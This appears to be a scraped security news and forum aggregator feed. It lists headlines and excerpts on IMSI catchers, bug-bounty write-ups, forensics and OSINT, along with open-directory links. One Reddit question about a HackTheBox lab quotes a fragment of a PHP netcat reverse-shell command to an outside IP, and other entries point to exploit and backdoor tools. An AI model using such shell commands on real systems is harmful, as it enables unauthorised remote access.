    The paper that drew this to my attention: https://arxiv.org/pdf/1510.07563.pdf Corresponding article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ In the paper, it claims that they can pull IMSI and IMEI off of smartphones, but I see no claim of knowing what the number or name of the phone is. If all they have is an IMSI and IMEI, am I really at risk? Is it usable information to have these numbers to a person who is undefined. Like, if someone stole my gmail password without knowing who I was or my account name, they could try it in every gmail account starting at a@gmail.com, but that might take a long time. Right? So the question is basically, is there actually a danger present in having my IMSI and IMEI accessed due to either the release of the information itself or in that there might be a way to connect it to me that I'm not aware of? I tried looking through Wikipedia for an answer. It's either not there or I'm too dumb. Either way I'd appreciate help in my paranoid quest for knowledge if any Redditors would be kind enough to offer it. tl;dr: What can an IMSI catcher know? & What can the operator do with that information? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Looking for resources on detection engineering
    Hi there, I am trying to develop myself in detection engineering, have you got any interesting resources on the topic? Cheers submitted by /u/zakibros [link] [comments]  ( 1 min )
    I know that Stingrays can capture IMSI #s from nearby smartphones. Can they also capture phone numbers and personal data too or is it just the serial number?
    I know the authorities might have a database, but let's say a hacker picked up my smartphone with an IMSI catcher. They really know nothing right? Because they can't extract anything useful from that, right? Is that true or am I being naive. I read a paper that claimed that the extraction of IMSIs from smartphones was a security threat, but without a phone number, it doesn't seem all that useful to them. Article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ Paper: http://go.redirectingat.com/?id=100098X1555750&xs=1&url=http%3A%2F%2Farxiv.org%2Fabs%2F1510.07563&sref=rss submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    how does a malware call back using DGA DNS?
    I was reading more into the SolarWinds hack and I noticed that the malware called back home using a DGA DNS algorithm, but I'm struggling to understand how did the hackers know which domain to buy/use for their malware? Based on the article: https://en.wikipedia.org/wiki/Domain_generation_algorithm I can understand how the malware generates the domain names but how do the C2 and the malware meet at a certain domain name? Especially if the malware generates 50k domains? submitted by /u/ak_z [link] [comments]  ( 3 min )
    OK what’s the Reddit hack to wear you can’t send a private message because it thinks you have over 100 letters of tax this is currently going on I was banned for some thing I have no clue of why trying to figure this out
    submitted by /u/itwasEMOTIONALmurder [link] [comments]
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 1 min )
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 2 min )
  • Open

    Authentication Bypass & ATO
    Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to… Continue reading on Medium »  ( 1 min )
    Get your own Hacking VPS for free in 2022!!
    Introduction Continue reading on Medium »  ( 3 min )
    Host Header Injection Lead To Account Takeover
    Hello amazing hacker, Today, I want to talk about one of my finding in private pentest program that lead me takeover other user account by… Continue reading on Medium »  ( 2 min )
    PHP Type Juggling Vulnerability
    In the name of God, the Most Gracious, the Most Merciful Continue reading on Medium »
    STORED XSS
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    2FA bypass by reading the documentation
    This is a fairly simple and short writeup, but i think is worth sharing, so lets get started. Continue reading on Medium »  ( 1 min )
  • Open

    blog/wp-json/wp/v2/users FILE is enable it will used for bruteforce attack the admin panel at blog/wp-login.php
    Mail.ru disclosed a bug submitted by kassem_s94: https://hackerone.com/reports/1403302
  • Open

    Subpoenaed iPhone and delay in turning it over to police--general outline of what can be lost in this delay?
    Ongoing case with Alec Baldwin and on set shooting that resulted in death. Phone was subpoenaed in mid December, still hasn't been turned over. Link to subpoena in comments. Cell carrier is Verizon. By delaying, I would think anything he has deleted will be much harder to recover, since the memory will be overwritten? Any general information or thoughts would be appreciated. submitted by /u/bbsittrr [link] [comments]  ( 3 min )
    Forensic computers
    Does anyone have experience with Siforce forensic workstations? How do they compare to Sumuri Talinos? submitted by /u/HorseAdministrative7 [link] [comments]  ( 2 min )
  • Open

    Hear No Evil: An Introduction to Audio File Analysis for OSINT
    It’s a new year, and that also means new blog posts about all things OSINT and Digital Forensics. In this one, we’re going to dive into… Continue reading on Medium »  ( 5 min )
    Certified in Open Source Intelligence (C|OSINT) Review
    Certification for OSINT Professional Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-09 Review
    No news updates yet today. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on System Weakness »  ( 8 min )
    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on Medium »  ( 7 min )
  • Open

    potato journal articles
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/soupcreamychicken [link] [comments]

  • Open

    Differential Fuzzing for Smart Contract VMs
    Article URL: https://github.com/fgsect/NeoDiff Comments URL: https://news.ycombinator.com/item?id=29857384 Points: 2 # Comments: 0  ( 2 min )
    Smart Contract VM Bugs via Differential Fuzzing [pdf]
    Article URL: https://raw.githubusercontent.com/fgsect/NeoDiff/main/roots21-2.pdf Comments URL: https://news.ycombinator.com/item?id=29850086 Points: 2 # Comments: 0  ( 119 min )
  • Open

    My OD full of japanese music and more.
    http://193.104.197.109/ submitted by /u/Connor_CZ [link] [comments]
  • Open

    From email to Github accounts
    While searching lately for new OSINT techniques on Github, I have found an old repository entitled “enumerate-github-users” by antnks. Continue reading on Medium »  ( 1 min )
    Understanding Web Fuzzing for Ethical Hacking
    Websites have unique addresses just like your home address known as a Uniform Resource Locator (URL). If multiple entities shared one… Continue reading on Medium »  ( 2 min )
    Weaponizing Information: To the Agitator Go the Spoils of OSINT
    *Note: This article was originally published by the author on March 9, 2020. Continue reading on Medium »  ( 5 min )
    The OSINT-ification of Job Boards: Hunting the Hunters
    *Note: This article was originally published by the author on July 2, 2019. Continue reading on Medium »  ( 11 min )
    How I Used OSINT to Find an Abandoned Hotel
    Continue reading on Medium »  ( 3 min )
    Applying OSINT Tactics to Twitter
    Allow me to begin by stating that the accounts (and tasks) depicted in this article were created for the purpose of OSINT education… Continue reading on Medium »  ( 3 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using NTQuerySystemInformation
    Get acquainted with the undocumented low-level yet powerful APIs from winternls and how to use the NtQuerySystemInformation function to get a list of all the processes running in the system. https://tbhaxor.com/windows-process-listing-using-ntquerysysteminformation/ submitted by /u/tbhaxor [link] [comments]
    Get expert training on advanced hunting
    submitted by /u/dmchell [link] [comments]
  • Open

    MSRC researcher recognition and CEO of DSPH at 18 years
    Hi everyone,  It was 7 January 2022 when I woke up from sleep I saw an email from MSRC i thought it must be related to the vulnerability… Continue reading on Medium »  ( 1 min )
    Research on Host Header Injection — Cyber Sapiens Internship Task-11
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Research on XML eXternal Entity Injection (XXE)-Cyber Sapiens Internship Task-10
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    Research on HTML Injection- Cyber Sapiens Internship Task-9
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    IDOR: A BEGINNER’S GUIDE
    IDOR is a type of access control vulnerability. IDOR vulnerability can occur when user-supplied input is received by the web server to ret Continue reading on Medium »  ( 2 min )
    How to remove crap using ‘cut’ cmd from Httprobe output?
    Default output from httprobe looks like; In certain conditions as ➖ Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-08 Review
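    Useful useless models: modelling approaches for complex problems in cybersecurity by ourren New APT trend: rising use of strategically dormant domains, hard to detect by ourren Summary of the 2021 cybersecurity industry landscape by ourren Development trends of major global cybersecurity threats in 2021 by ourren For more recent articles, visit SecWiki  ( 2 min )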
  • Open

    How does SAMBA differ between NULL authentication and anonymous authentication?
    Context: I am a penetration tester and I am trying to learn more deeply about SMB. I use the tool crackmapexec to enumerate SMB, and I recently came across something weird when trying the following commands:
    - crackmapexec smb IP This sets the Domain name, User name, and Host name to NULL
    - crackmapexec smb IP -u '' -p '' This sets the Domain name, but sets the User name, and Host name to NULL
    - crackmapexec smb IP -u 'anything' -p '' This sets the Domain name, User name, and Host name
    This made me wonder, why does SAMBA treat any username as an anonymous login?
    Question: I've been looking through the SAMBA documentation (which is horrible someone please change this), to find what allows/disallows NULL and anonymous authentication. However, I have been unable to find what settings allow these. submitted by /u/jakeyee [link] [comments]
    book suggestions for highly technical subjects
    Hi Reddit, I'm looking for books similar to The ShellCoder Handbook but with updated contents. I'm focused on the exploit dev part. But anything else is also fine as long as it's highly technical. submitted by /u/ak_z [link] [comments]
    Spyware paranoia and tools to use to scan
    I have been suspecting a long-term 'friend' of mine has been spying on me for a while now due to suspicious things they say and suspicious activity in general. Their motivation I suspect due to their personality and history (if they are indeed spying on me) is just to fuck with me or to gather information on me for later usage. I would like to know of any tools I can use to discover any keyloggers, screen capturers, or other types of spyware that can access my social media accounts, browser, or just my device in general. I have scanned my device with a malware scanner and windows defender already, but nothing major has been discovered. I'm wondering if I should do a rootkit scan as well? Thanks Edit: Obviously, I'm aware this is an unlikely scenario, but there have just been a lot of big 'coincidences' that have been bugging me and I'm trying to do some research. If you ignore the background story, I guess I'm just trying to find out current/relevant possible attack vectors/specific tools for low-level personal spying (hardware, software, and network-based). And then, the appropriate tools and methods a defender would use. I apologise that this seems to be the wrong subreddit but I would appreciate any redirects to relevant subreddits/external resources. submitted by /u/Large-Run9434 [link] [comments]
  • Open

    Project to Regularly and Automatically Update Docker Images that contains a lot of NetSec related tools
    submitted by /u/deleee [link] [comments]
  • Open

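    The overlooked security of NTP
    Time is something we rely on most in daily use yet pay the least attention to, but attacks on the NTP time protocol can cause enormous harm and deserve our attention.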

  • Open

    Timing-Based Username Enumeration: What’s a fix versus mitigation?
    For web-based applications, Timing-based Username Enumeration is a great find. For testers it’s low-hanging fruit and a great way to… Continue reading on Medium »
    December UI/UX Contest Winner
    and our $425 prize winner is…🏆 Continue reading on SW DAO »  ( 1 min )
    A Cool Account Takeover Vulnerability due to lack of Client Side Validation
    Hello Everyone, My Name is Arth Bajpai , I’m from Lucknow India and this is my First writeup related to bug bounty Continue reading on Medium »  ( 2 min )
    Tinyman Bug Bounty Campaign
    Tinyman announces bug bounty campaign. Continue reading on Medium »  ( 1 min )
    Being Anonymous on the Internet(proxychains)
    Proxy chains Continue reading on Medium »  ( 1 min )
    Bypassing Door Passwords
    Instead of a key, this type of lock system requires a numerical code to grant entry to a facility or property. The code is punched in by… Continue reading on Medium »  ( 1 min )
    GYSR Bug Bounty Program
    Our highest priority has always been safety and security. Introducing the GYSR bug bounty program in partnership with Immunefi. Continue reading on GYSR »  ( 1 min )
    XXE — TryHackme WriteUp
    XML External Entity Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i got financial advisor by simply hack into their membership plan !
    Hello Infosec geeks Continue reading on Medium »  ( 1 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time. Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Received a Performance Evaluation yesterday
    First time poster here. Previous post for context: https://www.reddit.com/r/SecurityCareerAdvice/comments/rc6awd/i_passed_iso_27001_at_the_company_i_work_for/ As the title says, I got a performance evaluation today with a raise! One thing they asked me to look into is to find credentials (IT Standards like 27K1) to improve the organization. We just passed ISO 27001, so I'm guessing they are looking to expand themselves with additional credentials (IT Standards like 27K1). Any ideas? FYI, the company is a software-as-a-service business. submitted by /u/LordCommanderTaurusG [link] [comments]  ( 1 min )
    Internal Log4J attempts?
    hey guys, I understand somewhat how the exploit works but when you see in the logs a log4j exploit attempt that is internal to internal attempting a request for an outside LDAP server. How could that happen exactly? As in how was that request made in the first place? Does it mean the internal machine was exploited or is it just a request attempt through another means? If the machine is not vulnerable to make outgoing requests, is it just a case of blocking the server IP? Or is the mere fact that an attempt was made indicate vulnerability? Hopefully that made sense! Thanks submitted by /u/_illusions25 [link] [comments]  ( 1 min )
    How best to send sensitive personal identity documents to new employer?
    Starting a new job remotely and they've hit me via email with the I-9 Form, W4, and Direct Deposit Paychex form. So the forms have my SSN, bank details and personal info + my passport as an additional identity document. How do I send this stuff responsibly? I was thinking I could password protect each PDF inside a zip file and then call them to give them the password. What software do I need to encrypt these PDFs? Any recommendations or advice on a best practice here? submitted by /u/ChampionSSJ [link] [comments]  ( 2 min )
    CISSP Advice
    Just like that title says, what advice would you give someone that will begin studying for this cert. Like is there a specific book, study guide/resources you’d recommend? I know there is a ton of material out there but some is hard to follow. Recent test takers advice is appreciated. Thanks! submitted by /u/zzizourm [link] [comments]  ( 3 min )
    CEH and CEH Master worth it
    is the CEH and CEH Practical worth taking if I am in my junior year in computer science? will it help at least land me an interview in a company? is it accredited in Canada? [Edit] Thank you so much for your comments, I will be shifting to eJPT and maybe CISSP after. submitted by /u/deadmeme-1 [link] [comments]  ( 4 min )
  • Open

    NPM might be executing malicious code in your CI without your knowledge
    submitted by /u/words_are_sacred [link] [comments]  ( 1 min )
    Mutual Authentication: A Component of Zero Trust
    submitted by /u/alexfornuto [link] [comments]
    Lopsided routing, a stealthy hole punch into FortiGate
    submitted by /u/oherrala [link] [comments]  ( 1 min )
    PHP 7.3-8.1 disable_functions bypass using string concatenation (PoC)
    submitted by /u/dradzenglor [link] [comments]
  • Open

    Bypass Cloudflare
    My leak bot https://twitter.com/leak_scavenger for a long time crawled the website ghostbin.co. Some of you asked how my bot is able to do… Continue reading on Medium »  ( 2 min )
    OSINT — Getting the E-mail of a LinkedIn Profile
    Due to the LinkedIn data leaks, some information such as the ID and e-mail of the user's profile was made available on… Continue reading on 100security »  ( 1 min )
  • Open

    thefLink/Hunt-Sleeping-Beacons: Aims to identify sleeping beacons
    submitted by /u/dmchell [link] [comments]
    NOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies
    submitted by /u/dmchell [link] [comments]
    Bypassing Door Passwords w/wo default passwords
    submitted by /u/SocketPuppets [link] [comments]
    EDR Parallel-asis through Analysis - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Email threads about potatoes (recipes, etc)
    submitted by /u/ryankrage77 [link] [comments]
    Google drives were always a debatable content on this sub. Now it seems that the "don't be evil" firm will answer this question for you.
    https://www.techradar.com/news/google-drive-could-soon-start-locking-your-personal-files EDIT: For clarification, your personal data (I guess even copyrighted material) not publicly available (open) are not concerned. But the findings shared here may become more and more rare. submitted by /u/krazybug [link] [comments]  ( 2 min )
    Wide selection of fairly recent magazines, mostly English language, but also German, Dutch and others
    submitted by /u/Dutchlawyer [link] [comments]
    Christmas Movies
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Another music one
    submitted by /u/International_Milk_1 [link] [comments]
    VARIOUS (300 TBS OF STUFF): Tom and Jerry cartoons, K-pop music, courses on bitcoin, and video editing, Excel for beginners, and so on.
    submitted by /u/International_Milk_1 [link] [comments]
    more music (Some empty folders)
    submitted by /u/International_Milk_1 [link] [comments]
    K-POP. METAL, ROCK
    submitted by /u/International_Milk_1 [link] [comments]
    MUSIC
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    SecWiki News 2022-01-07 Review
    "2021 Space Security Report" by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

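    Antivirus Software Market Expected to Reach USD 4.54 Billion by 2025
    The antivirus software market is expected to reach USD 4.54 billion in 2025.  ( 1 min )
    FreeBuf Morning Brief | Shanghai's first digital-yuan employment subsidy is paid out; VMware fixes heap overflow vulnerability in its products
    It can verify and cross-check the relevant data, providing information to support the fight against crime.  ( 1 min )
    Bandit Walkthrough Notes [Learning Basic Linux Commands]
    Bandit is a site for learning Linux. It uses game-style levels to help us learn the basic Linux commands, which makes it well suited to learners with little or no background. This post clears every level and records and collects the related knowledge.  ( 1 min )
    The Date Is Set! CIS 2021 Cybersecurity Innovation Conference, Spring Edition, Is Coming
    The conference is officially scheduled for March 2 to 3 at the Baohua Marriott Hotel in Shanghai.  ( 1 min )
    A Must-Read for Newcomers! The Difference Between DOM-Based XSS and Reflected XSS
    This article can help beginners new to the field better understand XSS vulnerabilities, and writing it also reinforces my own understanding of XSS. If anything is incorrect, corrections are welcome.  ( 1 min )
    FreeBuf Enterprise-Side Group Discussion | Talking About Cybersecurity Vendor Consolidation (this issue includes a bonus topic)
    Gartner predicts that cybersecurity vendor consolidation will be one of the industry trends of 2022, and most organizations see vendor consolidation as a way to improve security.  ( 1 min )
    At the Start of the New Year, 斗象科技 (Tophant) Receives Its First Recognition of 2022
    In the new year, 斗象科技 will work on strengthening its fundamentals and, with even better products and services, do a better job on every task.
    FreeBuf Weekly | NoReboot malware makes an iPhone fake a shutdown; hackers steal credit card information while you watch videos
    We have summarized and recommended this week's hot news, quality articles and handy tools, so that you don't miss any of this week's highlights!  ( 1 min )
    NoReboot Malware Makes an iPhone Fake a Shutdown
    The technique directly simulates what happens when a user's iPhone shuts down and disables most of the physical feedback, so the iPhone looks as if it has really been powered off.  ( 1 min )
    What "Methods" Do Hackers Use to Steal Cryptocurrency?
    Below is a roundup of the five biggest cryptocurrency thefts of all time; perhaps some patterns in how cryptocurrency gets stolen can be found.  ( 1 min )
    FinalSite Hit by Ransomware Attack, Thousands of School Websites Inaccessible
    In recent years schools have become a popular target for ransomware attacks, especially K12 schools with limited security budgets.  ( 1 min )
    Huami Technology (华米科技) Is Hiring a Senior Security Engineer
    Founded in 2013, Huami Technology is a globally leading smart wearable innovation company that hopes, through its strategy of "cloud (health cloud services) + device (wearable terminals) + chip (chips)", to use the power of technology to help everyone around the world enjoy better exercise, health and medical services.
    Security Knowledge Graph | Cloud-Side Data Analysis of the Log4j Incident
    Achieving precise and rapid pinpointing of advanced threats  ( 1 min )
    A Detailed Look at the UAC Bypass Technique That Abuses the AppInfo RPC Service
    In our earlier attack-technique assessment we introduced a relatively new UAC bypass method used in the wild; this article analyzes its technical details in depth once more.  ( 1 min )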
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    7+ Major Reasons to Hire a Red Team to Harden Your App Sec
    The growing cyberthreat landscape has brought a storm in the online marketplace. From the online studies and research, there were around… Continue reading on Medium »  ( 4 min )
  • Open

    Exploiting Redash instances with CVE-2021-41192
    Article URL: https://ian.sh/redash Comments URL: https://news.ycombinator.com/item?id=29834624 Points: 1 # Comments: 0  ( 5 min )
  • Open

    Is it possible to extract WhatsApp data from this type of scenario?
    Phone: iPhone XS (A12 chip) [Wipe data after 10 attempts is ON]; Passcode: Unknown; iOS Ver: 14.7; Mode: AFU; WhatsApp: 2FA Active. I have access to UFED, Oxygen, XRY; also I have budget for more tools if there is any tool that is capable of doing it. Thank you in advance. submitted by /u/wtfisgoingong1 [link] [comments]  ( 1 min )

  • Open

    Unprotected directory of [NSFW] videos and images from internet sex work
    submitted by /u/Shark_Octopus [link] [comments]
    Movies
    submitted by /u/International_Milk_1 [link] [comments]
    "Soul, Hip Hop, Rare Grooves, House and Jazz "
    submitted by /u/International_Milk_1 [link] [comments]
    EPISODES of StarTrek-NewVoyages.
    submitted by /u/International_Milk_1 [link] [comments]
    Capybaras
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    movie stills featuring reptiles and amphibians.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    The JNDI Strikes Back – Unauthenticated RCE in H2 Database Console
    submitted by /u/SRMish3 [link] [comments]
    Garlicshare - Private and secure file sharing over the Tor network
    submitted by /u/ILDVUCE [link] [comments]  ( 1 min )
    Announcing the first open source security tool for Heroku!
    submitted by /u/cloud-defender [link] [comments]
    SANS Christmas Challenge 2021 - Write-up
    submitted by /u/the-useless-one [link] [comments]  ( 1 min )
  • Open

    Imaging a live server
    I wanted to ask if there was a good way to create a forensic image of a server that can't be taken offline? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 1 min )
    Any free practice images out there
    Hi people, I work within digital forensics and I'm currently off work with covid. Due to the nature of my job I cannot work from home, and was wondering if there are any websites out there that provide disk images for fictional triage / investigation. Thanks in advance submitted by /u/LukeT1123 [link] [comments]  ( 1 min )
  • Open

    Good security certs to obtain for better progression
    Hi I have been working in the information security industry for around 2 years now and recently secured a permanent role in the UK. My roadmap for this year is to obtain security certs and this is what I am planning: CompTIA Security+, Microsoft Azure Fundamentals. What advice do you have to reach a £75K+ salary in the next two to three years? Thanks submitted by /u/gavxz [link] [comments]  ( 1 min )
    Technicalities in VPN effectivity: Can anyone online tell when you're using a VPN?
    If a VPN disguises your IP address when you use the internet, do internet providers and the websites you visit realise that you're using a VPN or do they get the perfect impression that you're a normal internet user from wherever it is you go with your VPN. For reference, here are a few scenarios where your cover could be compromised: An internet user using an internet company only functional in Australia would be in say, Pakistan through a VPN. You lose your connection to your VPN more than once on the same website (so you're switching back and forth between locations in seconds) trackers could not only realise that you're using a VPN but also know your actual location. (It may not be the case that this is how VPN works but:) Among its many available locations, say for example you chose NY, USA, if a VPN provider simply transports all its users choosing NY, USA to one precise location in NY, wouldn’t it be clear that all that activity coming from one spot, down to the coordinate isn’t really thousands of computers crammed in one area but people using the same VPN service. I have loads of thoughts on how if someone really really wanted to find your location, they could definitely do so, and how even small windows of error are subject to great scrutiny online. However, it's all dependent on how much of my speculation is actually true. Cheers! This question has been posted on other relevant subreddits as well. submitted by /u/lazariomo [link] [comments]  ( 3 min )
    Digital certificates: why do the certificates not get stolen?
    I am probably missing something here, but I don't get how digital certificates prove the identity of whoever has them. Granted, if someone decrypts a certificate with the public key of a certificate authority and retrieves the public key of a certain party, they can know for sure that this authority once signed the certificate request for said party, but can't any given person retrieve that certificate from that party, and then start providing it as if it was their own? submitted by /u/Pegasus9208 [link] [comments]  ( 3 min )
    HackTheBox Nibbles: Full TTY Shell how?
    So I'm reading a walkthrough of Nibbles from 0xdf and they used a PHP code like: &1|nc 10.10.15.154 8082 >/tmp/f"); ?> I was stuck for hours trying to get a full TTY shell, and none of the guides on breaking out of limited shell has worked. Clearly, 0xdf knew what he was doing. I want to learn more about what this command is doing: Where does one learn how to do this? Is there more of where this comes from? (I'd like to learn more so I can note it down) What is the logic behind this? Why is this superior to the reverse shell PHP I crafted using MSFVENOM? I'd like to be provided a fishing rod and a lake, rather than the fish. I'd like to learn how to do these things before I read up on how somebody else did it. I'm also okay with paid resources on the subject (books, courses, subscription), as I believe content creators should be paid for their skill and time. submitted by /u/DiickBenderSociety [link] [comments]  ( 1 min )
    Who is hosting the most malware?
    I would like to know from your experience where have you seen the most malware, most often, if you would have to choose between IBM networks, DigitalOcean, Microsoft, ATT, Google, Akamai, Github and Amazon networks? submitted by /u/ciovlici [link] [comments]  ( 2 min )
    How do I start building the security team?
    Hello everyone, I'm currently working at a small startup company as one of the 5 people acting as admin / engineer / architect / security people / printer fixer / security analyst. I realize that the team is quickly burnt out with the variety of tasks and mountains of unending work in this state. I talked to my boss about this and he agrees that something needs to be done. We are planning to hire a third party vendor to do some of the stuff. However, my boss is quite adamant that the security roles must be done in house and asked me to create a plan on how many divisions we need to create, how many people to hire etc. Is there any guide out there that can help me with this in CIS style with focus on scalability? So for example in a small organization you need at least these teams, later on you can add these teams etc. Or can you guys share how your organization tackled this challenge? Any input is greatly appreciated. Thanks for sharing submitted by /u/XynderK [link] [comments]  ( 4 min )
  • Open

    Grafana LFI on https://grafana.mariadb.org
    MariaDB disclosed a bug submitted by realtess: https://hackerone.com/reports/1419213
  • Open

    Another simple .NET executable to create and add a backdoor user
    Another simple but useful .NET executable that creates and adds an arbitrary user or domain user to the Local Administrators groups. Very useful for privilege escalations on Windows (i.e. unquoted service path) Repo: https://github.com/notdodo/LocalAdminSharp submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Cobalt Strike Sleep Mask IOC
    https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs Recently noticed an IOC of the sleep mask kit while testing my own payloads, being the hook on the sleep() winapi. submitted by /u/CodeXTF2 [link] [comments]
    What Is Red Teaming, How Does It Work and Why Is It Important?
    submitted by /u/stanley9528 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-06 Review
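    Firmware Analysis in Vulnerability Hunting on a Certain System by ourren; In-Depth Analysis of the Underground-Economy Challenges in the DataCon2021 Domain Name System Security Track by ourren; A Brief Discussion on Building Data Security Operations Capability by ourren; List and Full Text of the 2021 "CCF Outstanding Doctoral Dissertation Award" by ourren. For more of the latest articles, visit SecWiki  ( 2 min )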
  • Open

    Using BBRF with a Focus on Reconnaissance #bugbounty
    Hello, how are you? Continue reading on Medium »  ( 4 min )
    My First Bug Bounty Report | POST-based XSS
    Hello Ninjas!!!! I am Vishal Barot aka vFlexo and today I decided to publish a write-up on how I got first bounty through my first ever… Continue reading on Medium »  ( 2 min )
    Authorization bypass — Gmail
    About the vulnerability Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Advanced Searching with Google Dorking
    What is Google Dorking? Continue reading on Medium »  ( 2 min )
    Writeup_TryHackMe_Searchlight — IMINT
    As part of OSINT learning, I am working to complete all the Try_Hack_Me rooms which are linked to OSINT research. Continue reading on Medium »
  • Open

    Kerberos Authentication (again… but better)
    One of the most known authentication protocols in Windows environment is Kerberos (RFC 1510 for the V5). Continue reading on Medium »
    What is a red team
    In a red team/blue team cybersecurity simulation, the red team acts as an adversary, attempting to identify and exploit potential… Continue reading on Medium »  ( 3 min )
    CompTIA ITF+
    I was fortunate that the CompTIA ANZ Business Technology Community & Horden Technologies offered a free, entry-level qualification for… Continue reading on Medium »  ( 1 min )
  • Open

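    New APT Trend: Use of Strategically Dormant Domains Is Rising and Hard to Detect
    Attackers increasingly tend to register domains in advance and hold them in reserve, and attacks using such strategically dormant domains are becoming more common.  ( 1 min )
    Red Sun Security (红日安全) Lab Range 3
    The goal is to obtain a file from the Win2012 domain controller.  ( 1 min )
    Custom-Built: Creating a Mobile System Just for White Hats
    To do a good job of analyzing malicious samples, this article shares a new approach: a custom-built mobile system made specifically for white hats!  ( 1 min )
    The Ten Most Common ATT&CK Tactics and Techniques
    Picus researchers collected more than two hundred thousand real-world threat samples from various sources, identified the samples' tactics, techniques and procedures (TTPs), and classified each TTP; across all samples there were more than 1.8 million ATT&CK techniques.  ( 1 min )
    FreeBuf Morning Brief | Scammers pose as brokers to defraud investors of USD 50 million; shopping and online-loan scams are the most common
    "Do e-commerce order brushing and earn money from home with a few taps", "Follow the teacher into stocks and make big money"... Online, users often receive messages like these pushed by all kinds of apps, but behind these tempting "pies in the sky" lie dangerous "traps".  ( 1 min )
    What Is the SSVC Mentioned in CISA's "Cybersecurity Incident and Vulnerability Response Playbooks"?
    As a new vulnerability assessment method, SSVC is characterized mainly by three orientations: toward the supply chain, toward decision outcomes, and toward practical experience.  ( 1 min )
    Cipher Suites: Ciphers, Algorithms and Negotiating Security Settings (Part 1)
    But cipher suites do play a vital role in every HTTPS connection we establish over the Internet.  ( 1 min )
    Google Steps In, "Snapping Up" Israeli Cybersecurity Company Siemplify for USD 500 Million
    Reuters reported that Google's cloud computing division has completed the acquisition of Israeli cybersecurity company Siemplify.  ( 1 min )
    Seeking New Energy, a New Future for Security | Official Website of the First "New Forces in Cybersecurity" (网安新势力) Conference Goes Live
    The official website of the first "New Forces in Cybersecurity" conference went live today. Sign up now!  ( 1 min )
    Honda and Acura Cars Affected by Millennium Bug, Clocks Roll Back to 2002
    Will Honda and Acura really make owners wait seven months for this bug to be fixed?
    Researchers Expose a Long-Lurking Financial Theft Gang: Elephant Beetle
    The group targets transaction processing systems and has been stealing funds from financial entities in Latin America for at least four years.  ( 1 min )
    Goodbye Script Kiddie Series | Java Security (2): Java Decompilation Techniques
    The Goodbye Script Kiddie series is a new feature on this official account covering code auditing, security research and vulnerability reproduction, intended to help readers understand how vulnerabilities work more deeply and master the thinking and techniques of vulnerability hunting. We will explain Java security technologies step by step, from the basics to the advanced.  ( 1 min )
    Statistics: The Impact and Cost of Cybersecurity Incidents
    Software security is the foundational line of defense for cybersecurity, which also reminds us to take code security seriously from the very start of software development and improve the security of software.  ( 1 min )
    Git Information Leaks: How They Work and a Summary of Exploitation
    When misconfigured, the ".git" files may be deployed directly to the production environment, which causes a git leak.  ( 1 min )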
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
